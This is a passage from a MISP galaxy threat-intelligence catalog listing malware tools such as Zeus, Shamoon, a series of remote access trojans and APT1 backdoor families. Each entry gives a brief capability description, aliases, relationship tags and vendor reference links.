  • similar: misp-galaxy:malpedia="BlackEnergy" with estimative-language:likelihood-probability="likely"

Table 16389. Table References

Links

https://www.virusbulletin.com/conference/vb2014/abstracts/back-blackenergy-2014-targeted-attacks-ukraine-and-poland/

Trojan.Seaduke

Trojan.Seaduke is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The tag is: misp-galaxy:tool="Trojan.Seaduke"

Trojan.Seaduke is also known as:

  • Seaduke

Table 16390. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-031915-4935-99

Backdoor.Tinybaron

The tag is: misp-galaxy:tool="Backdoor.Tinybaron"

Incognito RAT

The tag is: misp-galaxy:tool="Incognito RAT"

DownRage

The tag is: misp-galaxy:tool="DownRage"

DownRage is also known as:

  • Carberplike

Table 16391. Table References

Links

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

https://twitter.com/Timo_Steffens/status/814781584536719360

GeminiDuke

GeminiDuke is malware that was used by APT29 from 2009 to 2012.

The tag is: misp-galaxy:tool="GeminiDuke"

GeminiDuke has relationships with:

  • similar: misp-galaxy:mitre-malware="GeminiDuke - S0049" with estimative-language:likelihood-probability="likely"

Table 16392. Table References

Links

https://attack.mitre.org/wiki/Software/S0049

Zeus

Trojan.Zbot, also called Zeus, is a Trojan horse that attempts to steal confidential information from the compromised computer. It may also download configuration files and updates from the Internet. The Trojan is created using a Trojan-building toolkit.

The tag is: misp-galaxy:tool="Zeus"

Zeus is also known as:

  • Trojan.Zbot

  • Zbot

Zeus has relationships with:

  • similar: misp-galaxy:banker="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 16393. Table References

Links

https://en.wikipedia.org/wiki/Zeus_(malware)

https://www.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99

Shifu

Shifu is a Banking Trojan first discovered in 2015. Shifu is based on the Shiz source code which incorporated techniques used by Zeus. Attackers use Shifu to steal credentials for online banking websites around the world, starting in Russia but later including the UK, Italy, and others.

The tag is: misp-galaxy:tool="Shifu"

Shifu has relationships with:

  • similar: misp-galaxy:malpedia="Shifu" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Shiz" with estimative-language:likelihood-probability="likely"

Table 16394. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/

Shiz

The new variant of the Shiz Trojan malware targets mission-critical enterprise resource planning (ERP) applications — particularly SAP users.

The tag is: misp-galaxy:tool="Shiz"

Shiz has relationships with:

  • similar: misp-galaxy:tool="Shifu" with estimative-language:likelihood-probability="likely"

Table 16395. Table References

Links

https://securityintelligence.com/tag/shiz-trojan-malware/

MM Core

Also known as “BaneChant”, MM Core is a file-less APT which is executed in memory by a downloader component. It was first reported in 2013 under the version number “2.0-LNK” where it used the tag “BaneChant” in its command-and-control (C2) network request. A second version “2.1-LNK” with the network tag “StrangeLove” was discovered shortly after.

The tag is: misp-galaxy:tool="MM Core"

MM Core is also known as:

  • MM Core backdoor

  • BigBoss

  • SillyGoose

  • BaneChant

  • StrangeLove

MM Core has relationships with:

  • similar: misp-galaxy:malpedia="MM Core" with estimative-language:likelihood-probability="likely"

Table 16396. Table References

Links

https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose

Shamoon

Shamoon,[a] also known as Disttrack, is a modular computer virus discovered by Seculert[1] in 2012, targeting recent NT kernel-based versions of Microsoft Windows. The virus has been used for cyber espionage in the energy sector.[2][3][4] Its discovery was announced on 16 August 2012 by Symantec,[3] Kaspersky Lab,[5] and Seculert.[6] Similarities have been highlighted by Kaspersky Lab and Seculert between Shamoon and the Flame malware.[5][6]

The tag is: misp-galaxy:tool="Shamoon"

Shamoon is also known as:

  • DistTrack

Shamoon has relationships with:

  • similar: misp-galaxy:mitre-malware="Shamoon - S0140" with estimative-language:likelihood-probability="likely"

Table 16397. Table References

Links

https://en.wikipedia.org/wiki/Shamoon

https://securityaffairs.co/wordpress/78867/breaking-news/shamoon-virustotal.html

GhostAdmin

According to MalwareHunterTeam and other researchers that have looked at the malware’s source code, GhostAdmin seems to be a reworked version of CrimeScene, another botnet malware family that was active around 3-4 years ago.

The tag is: misp-galaxy:tool="GhostAdmin"

GhostAdmin has relationships with:

  • similar: misp-galaxy:malpedia="GhostAdmin" with estimative-language:likelihood-probability="likely"

Table 16398. Table References

Links

https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/

EyePyramid Malware

Two Italians referred to as the “Occhionero brothers” have been arrested and accused of using malware and a carefully-prepared spear-phishing scheme to spy on high-profile politicians and businessmen. This case has been called “EyePyramid”, which we first discussed last week. (Conspiracy theories aside, the name came from a domain name and directory path that was found during the research.)

The tag is: misp-galaxy:tool="EyePyramid Malware"

Table 16399. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/

LuminosityLink is a malware family costing $40 that purports to be a system administration utility

The tag is: misp-galaxy:tool="LuminosityLink"

Table 16400. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/

Flokibot

Floki Bot, described recently by Dr. Peter Stephenson from SC Magazine, is yet another bot based on the leaked Zeus code. However, the author came up with various custom modifications that makes it more interesting.

The tag is: misp-galaxy:tool="Flokibot"

Flokibot is also known as:

  • Floki Bot

  • Floki

Flokibot has relationships with:

  • similar: misp-galaxy:malpedia="FlokiBot" with estimative-language:likelihood-probability="almost-certain"

Table 16401. Table References

Links

https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/

https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/

ZeroT

Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus. Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.

The tag is: misp-galaxy:tool="ZeroT"

ZeroT has relationships with:

  • similar: misp-galaxy:mitre-malware="ZeroT - S0230" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"

Table 16402. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

StreamEx

Cylance dubbed this family of malware StreamEx, based upon a common exported function used across all samples ‘stream’, combined with the dropper functionality to append ‘ex’ to the DLL file name. The StreamEx family has the ability to access and modify the user’s file system, modify the registry, create system services, enumerate process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands. The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.

The tag is: misp-galaxy:tool="StreamEx"

StreamEx has relationships with:

  • similar: misp-galaxy:mitre-malware="StreamEx - S0142" with estimative-language:likelihood-probability="likely"

Table 16403. Table References

Links

https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

adzok

Remote Access Trojan

The tag is: misp-galaxy:tool="adzok"

adzok has relationships with:

  • similar: misp-galaxy:malpedia="Adzok" with estimative-language:likelihood-probability="almost-certain"

Table 16404. Table References

Links

https://github.com/kevthehermit/RATDecoders

albertino

Remote Access Trojan

The tag is: misp-galaxy:tool="albertino"

Table 16405. Table References

Links

https://github.com/kevthehermit/RATDecoders

arcom

Remote Access Trojan

The tag is: misp-galaxy:tool="arcom"

Table 16406. Table References

Links

https://github.com/kevthehermit/RATDecoders

blacknix

Remote Access Trojan

The tag is: misp-galaxy:tool="blacknix"

Table 16407. Table References

Links

https://github.com/kevthehermit/RATDecoders

bluebanana

Remote Access Trojan

The tag is: misp-galaxy:tool="bluebanana"

Table 16408. Table References

Links

https://github.com/kevthehermit/RATDecoders

bozok

Remote Access Trojan

The tag is: misp-galaxy:tool="bozok"

bozok has relationships with:

  • similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="almost-certain"

Table 16409. Table References

Links

https://github.com/kevthehermit/RATDecoders

clientmesh

Remote Access Trojan

The tag is: misp-galaxy:tool="clientmesh"

Table 16410. Table References

Links

https://github.com/kevthehermit/RATDecoders

cybergate

Remote Access Trojan

The tag is: misp-galaxy:tool="cybergate"

cybergate has relationships with:

  • similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="almost-certain"

Table 16411. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkcomet

Remote Access Trojan

The tag is: misp-galaxy:tool="darkcomet"

darkcomet has relationships with:

  • used-by: misp-galaxy:threat-actor="APT-C-27" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="almost-certain"

Table 16412. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkrat

Remote Access Trojan

The tag is: misp-galaxy:tool="darkrat"

darkrat has relationships with:

  • similar: misp-galaxy:malpedia="DarkRat" with estimative-language:likelihood-probability="almost-certain"

Table 16413. Table References

Links

https://github.com/kevthehermit/RATDecoders

gh0st

Remote Access Trojan

The tag is: misp-galaxy:tool="gh0st"

gh0st has relationships with:

  • similar: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="likely"

Table 16414. Table References

Links

https://github.com/kevthehermit/RATDecoders

greame

Remote Access Trojan

The tag is: misp-galaxy:tool="greame"

Table 16415. Table References

Links

https://github.com/kevthehermit/RATDecoders

hawkeye

Remote Access Trojan

The tag is: misp-galaxy:tool="hawkeye"

Table 16416. Table References

Links

https://github.com/kevthehermit/RATDecoders

javadropper

Remote Access Trojan

The tag is: misp-galaxy:tool="javadropper"

Table 16417. Table References

Links

https://github.com/kevthehermit/RATDecoders

lostdoor

Remote Access Trojan

The tag is: misp-galaxy:tool="lostdoor"

Table 16418. Table References

Links

https://github.com/kevthehermit/RATDecoders

luxnet

Remote Access Trojan

The tag is: misp-galaxy:tool="luxnet"

Table 16419. Table References

Links

https://github.com/kevthehermit/RATDecoders

pandora

Remote Access Trojan

The tag is: misp-galaxy:tool="pandora"

pandora has relationships with:

  • similar: misp-galaxy:malpedia="Pandora" with estimative-language:likelihood-probability="almost-certain"

Table 16420. Table References

Links

https://github.com/kevthehermit/RATDecoders

poisonivy

Remote Access Trojan

The tag is: misp-galaxy:tool="poisonivy"

poisonivy has relationships with:

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

Table 16421. Table References

Links

https://github.com/kevthehermit/RATDecoders

predatorpain

Remote Access Trojan

The tag is: misp-galaxy:tool="predatorpain"

Table 16422. Table References

Links

https://github.com/kevthehermit/RATDecoders

punisher

Remote Access Trojan

The tag is: misp-galaxy:tool="punisher"

Table 16423. Table References

Links

https://github.com/kevthehermit/RATDecoders

qrat

Remote Access Trojan

The tag is: misp-galaxy:tool="qrat"

qrat has relationships with:

  • similar: misp-galaxy:rat="Qarallax" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QRat" with estimative-language:likelihood-probability="almost-certain"

Table 16424. Table References

Links

https://github.com/kevthehermit/RATDecoders

shadowtech

Remote Access Trojan

The tag is: misp-galaxy:tool="shadowtech"

Table 16425. Table References

Links

https://github.com/kevthehermit/RATDecoders

smallnet

Remote Access Trojan

The tag is: misp-galaxy:tool="smallnet"

Table 16426. Table References

Links

https://github.com/kevthehermit/RATDecoders

spygate

Remote Access Trojan

The tag is: misp-galaxy:tool="spygate"

Table 16427. Table References

Links

https://github.com/kevthehermit/RATDecoders

template

Remote Access Trojan

The tag is: misp-galaxy:tool="template"

Table 16428. Table References

Links

https://github.com/kevthehermit/RATDecoders

tapaoux

Remote Access Trojan

The tag is: misp-galaxy:tool="tapaoux"

tapaoux has relationships with:

  • similar: misp-galaxy:malpedia="Tapaoux" with estimative-language:likelihood-probability="almost-certain"

Table 16429. Table References

Links

https://github.com/kevthehermit/RATDecoders

vantom

Remote Access Trojan

The tag is: misp-galaxy:tool="vantom"

Table 16430. Table References

Links

https://github.com/kevthehermit/RATDecoders

virusrat

Remote Access Trojan

The tag is: misp-galaxy:tool="virusrat"

Table 16431. Table References

Links

https://github.com/kevthehermit/RATDecoders

xena

Remote Access Trojan

The tag is: misp-galaxy:tool="xena"

Table 16432. Table References

Links

https://github.com/kevthehermit/RATDecoders

xtreme

Remote Access Trojan

The tag is: misp-galaxy:tool="xtreme"

Table 16433. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkddoser

Remote Access Trojan

The tag is: misp-galaxy:tool="darkddoser"

Table 16434. Table References

Links

https://github.com/kevthehermit/RATDecoders

jspy

Remote Access Trojan

The tag is: misp-galaxy:tool="jspy"

jspy has relationships with:

  • similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="almost-certain"

Table 16435. Table References

Links

https://github.com/kevthehermit/RATDecoders

xrat

Remote Access Trojan

The tag is: misp-galaxy:tool="xrat"

xrat has relationships with:

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="almost-certain"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

Table 16436. Table References

Links

https://github.com/kevthehermit/RATDecoders

PupyRAT

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.

The tag is: misp-galaxy:tool="PupyRAT"

Table 16437. Table References

Links

https://github.com/n1nj4sec/pupy

ELF_IMEIJ

Linux Arm malware spread via RFIs in cgi-bin scripts. This backdoor executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information.

The tag is: misp-galaxy:tool="ELF_IMEIJ"

Table 16438. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a

KHRAT

KHRAT is a small backdoor that has three exports (functions), namely, K1, K2, and K3. K1 checks if the current user is an administrator. If not, it uninstalls itself by calling the K2 function.

The tag is: misp-galaxy:tool="KHRAT"

KHRAT has relationships with:

  • similar: misp-galaxy:malpedia="KHRAT" with estimative-language:likelihood-probability="likely"

Table 16439. Table References

Links

https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor

Trochilus

The Trochilus RAT is a threatening RAT (Remote Access Trojan) that may evade many anti-virus programs. The Trochilus RAT is currently being used as part of an extended threat campaign in South East Asia. The first appearance of the Trochilus RAT in this campaign, which has been active since August of 2015, was first detected in the summer of 2015. The Trochilus RAT is currently being used against civil society organizations and government computers in the South East Asia region, particularly in attacks directed towards the government of Myanmar.

The tag is: misp-galaxy:tool="Trochilus"

Trochilus has relationships with:

  • similar: misp-galaxy:rat="Trochilus" with estimative-language:likelihood-probability="likely"

Table 16440. Table References

Links

http://www.enigmasoftware.com/trochilusrat-removal/

MoonWind

The MoonWind sample used for this analysis was compiled with a Chinese compiler known as BlackMoon, the same compiler used for the BlackMoon banking Trojan. While a number of attributes match the BlackMoon banking Trojan, the malware is not the same. Both malware families were simply compiled using the same compiler, and it was the BlackMoon artifacts that resulted in the naming of the BlackMoon banking Trojan. But because this new sample is different from the BlackMoon banking Trojan,

The tag is: misp-galaxy:tool="MoonWind"

MoonWind has relationships with:

  • similar: misp-galaxy:rat="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="MoonWind - S0149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

Table 16441. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

Chrysaor

Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout.

The tag is: misp-galaxy:tool="Chrysaor"

Chrysaor is also known as:

  • Pegasus

  • Pegasus spyware

Chrysaor has relationships with:

  • similar: misp-galaxy:mitre-malware="Pegasus for iOS - S0289" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Pegasus for Android - S0316" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

Table 16442. Table References

Links

https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

Sathurbot

The trojan serves as a backdoor. It can be controlled remotely.

The tag is: misp-galaxy:tool="Sathurbot"

Sathurbot has relationships with:

  • similar: misp-galaxy:malpedia="Sathurbot" with estimative-language:likelihood-probability="likely"

Table 16443. Table References

Links

http://virusradar.com/en/Win32_Sathurbot.A/description

https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/

AURIGA

The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is: misp-galaxy:tool="AURIGA"

AURIGA has relationships with:

  • similar: misp-galaxy:malpedia="Auriga" with estimative-language:likelihood-probability="almost-certain"

Table 16444. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BANGAT

The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is: misp-galaxy:tool="BANGAT"

BANGAT has relationships with:

  • similar: misp-galaxy:malpedia="bangat" with estimative-language:likelihood-probability="almost-certain"

Table 16445. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BISCUIT

BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network, enumerating and manipulating process, and transferring files. BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i).

The tag is: misp-galaxy:tool="BISCUIT"

BISCUIT has relationships with:

  • similar: misp-galaxy:mitre-malware="BISCUIT - S0017" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Biscuit" with estimative-language:likelihood-probability="almost-certain"

Table 16446. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BOUNCER

BOUNCER will load an extracted DLL into memory, and then will call the DLL’s dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information. It can accept at most five arguments, including a proxy IP, port and an x.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic.

The tag is: misp-galaxy:tool="BOUNCER"

BOUNCER has relationships with:

  • similar: misp-galaxy:malpedia="Bouncer" with estimative-language:likelihood-probability="almost-certain"

Table 16447. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

CALENDAR

This family of malware uses Google Calendar to retrieve commands and send results. It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using the hard coded email address and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service dll as a persistence mechanism. Artifacts of this may be found in the registry.

The tag is: misp-galaxy:tool="CALENDAR"

CALENDAR has relationships with:

  • similar: misp-galaxy:mitre-malware="CALENDAR - S0025" with estimative-language:likelihood-probability="likely"

Table 16448. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

COMBOS

The COMBOS malware family is an HTTP based backdoor. The backdoor is capable of file upload, file download, spawning a interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself.

The tag is: misp-galaxy:tool="COMBOS"

COMBOS has relationships with:

  • similar: misp-galaxy:malpedia="Combos" with estimative-language:likelihood-probability="almost-certain"

Table 16449. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

COOKIEBAG

his family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command & Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as means of a persistence mechanism. The hardcoded strings cited include a string of a command in common with several other APT1 families.

The tag is: misp-galaxy:tool="COOKIEBAG"

COOKIEBAG is also known as:

  • TROJAN.COOKIES

COOKIEBAG has relationships with:

  • similar: misp-galaxy:malpedia="CookieBag" with estimative-language:likelihood-probability="almost-certain"

Table 16450. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

DAIRY

Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall.

The tag is: misp-galaxy:tool="DAIRY"

DAIRY has relationships with:

  • similar: misp-galaxy:malpedia="Dairy" with estimative-language:likelihood-probability="almost-certain"

Table 16451. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GETMAIL

Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, one is a dll. The malware may create a registry artifact related to the executable.

The tag is: misp-galaxy:tool="GETMAIL"

GETMAIL has relationships with:

  • similar: misp-galaxy:malpedia="GetMail" with estimative-language:likelihood-probability="almost-certain"

Table 16452. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GDOCUPLOAD

This family of malware is a utility designed to upload files to Google Docs. Nearly all communications are with docs.google.com are SSL encrypted. The malware does not use Google’s published API to interact with their services. The malware does not currently work with Google Docs. It does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present.

The tag is: misp-galaxy:tool="GDOCUPLOAD"

Table 16453. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GLOOXMAIL

GLOOXMAIL communicates with Google’s Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that includes file upload and download, provide a remote shell, sending process listings, and terminating specified processes. The malware makes extensive use of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted.

The tag is: misp-galaxy:tool="GLOOXMAIL"

GLOOXMAIL is also known as:

  • TROJAN.GTALK

GLOOXMAIL has relationships with:

  • similar: misp-galaxy:mitre-malware="GLOOXMAIL - S0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GlooxMail" with estimative-language:likelihood-probability="almost-certain"

Table 16454. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GOGGLES

A family of downloader malware, that retrieves an encoded payload from a fixed location, usually in the form of a file with the .jpg extension. Some variants have just an .exe that acts as a downloader, others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory.

The tag is: misp-galaxy:tool="GOGGLES"

GOGGLES is also known as:

  • TROJAN.FOXY

GOGGLES has relationships with:

  • similar: misp-galaxy:malpedia="Goggles" with estimative-language:likelihood-probability="almost-certain"

Table 16455. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GREENCAT

Members of this family are full featured backdoors that communicates with a Web-based Command & Control (C2) server over SSL. Features include interactive shell, gathering system info, uploading and downloading files, and creating and killing processes, Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish persistence mechanism for them. Others contains functionality that allows it to install itself, replacing an existing Windows service, and uninstall itself. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories, additional malware artifacts may be found there.

The tag is: misp-galaxy:tool="GREENCAT"

Table 16456. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

HACKFASE

This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL.

The tag is: misp-galaxy:tool="HACKFASE"

Table 16457. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

HELAUTO

This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation.

The tag is: misp-galaxy:tool="HELAUTO"

HELAUTO has relationships with:

  • similar: misp-galaxy:malpedia="Helauto" with estimative-language:likelihood-probability="almost-certain"

Table 16458. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

KURTON

This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker but defaults to IPRIP if no service name is provided during install.

The tag is: misp-galaxy:tool="KURTON"

KURTON has relationships with:

  • similar: misp-galaxy:malpedia="Kurton" with estimative-language:likelihood-probability="almost-certain"

Table 16459. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LIGHTBOLT

LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication.

The tag is: misp-galaxy:tool="LIGHTBOLT"

Table 16460. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LIGHTDART

LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file. This RAR file (1.rar) is renamed and uploaded to an attacker controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates.

The tag is: misp-galaxy:tool="LIGHTDART"

Table 16461. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LONGRUN

LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string thequickbrownfxjmpsvalzydg is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol.

The tag is: misp-galaxy:tool="LONGRUN"

Table 16462. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

MANITSME

This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC looks for both the dropper file and the backdoor.

The tag is: misp-galaxy:tool="MANITSME"

MANITSME has relationships with:

  • similar: misp-galaxy:malpedia="ManItsMe" with estimative-language:likelihood-probability="almost-certain"

Table 16463. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

MAPIGET

This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service).

The tag is: misp-galaxy:tool="MAPIGET"

MAPIGET has relationships with:

  • similar: misp-galaxy:malpedia="MAPIget" with estimative-language:likelihood-probability="almost-certain"

Table 16464. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html

MINIASP

This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval.

The tag is: misp-galaxy:tool="MINIASP"

MINIASP has relationships with:

  • similar: misp-galaxy:malpedia="MiniASP" with estimative-language:likelihood-probability="almost-certain"

Table 16465. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

NEWSREELS

